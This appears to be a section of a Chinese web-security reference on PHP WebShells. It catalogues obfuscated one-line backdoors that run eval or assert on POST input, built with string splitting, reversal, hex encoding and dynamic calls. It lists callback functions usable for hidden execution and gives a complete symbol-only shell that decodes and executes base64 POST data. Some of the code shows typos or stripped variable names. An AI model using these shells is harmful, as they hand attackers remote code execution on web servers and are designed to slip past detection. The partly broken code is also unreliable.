5.1.8. WebShell

5.1.8. WebShell

5.1.8.1. 常见变形

- GLOBALS
- - eval($GLOBALS['_POST']['op']);
- $_FILE
- - eval($_FILE['name']);
- 拆分
- - assert(${"_PO"."ST"} ['sz']);
- 动态函数执行
- - $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
- create_function
- - $function = createfunction('$code',strrev('lave').'('.strrev('TEG$').'["code"]);');$function();
preg_replace
rot13
base64
- 进制转化
- - "\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"
- 利用文件名
- - FILE

5.1.8.2. 字符串变形函数

ucwords
ucfirst
trim
substr_replace
substr
strtr
strtoupper
strtolower
strtok
str_rot13

5.1.8.3. 回调函数

call_user_func_array
call_user_func
array_filter
array_walk
array_map
registregister_shutdown_function
register_tick_function
filter_var
filter_var_array
uasort
uksort
array_reduce
array_walk
array_walk_recursive

5.1.8.4. 特殊字符Shell

PHP的字符串可以在进行异或、自增运算的时候，会直接进行运算，故可以使用特殊字符来构成Shell。

@$++;$=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$}[!$](${$_}[$]);

$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
 
$_=$$____;
$___(base64_decode($_[_]));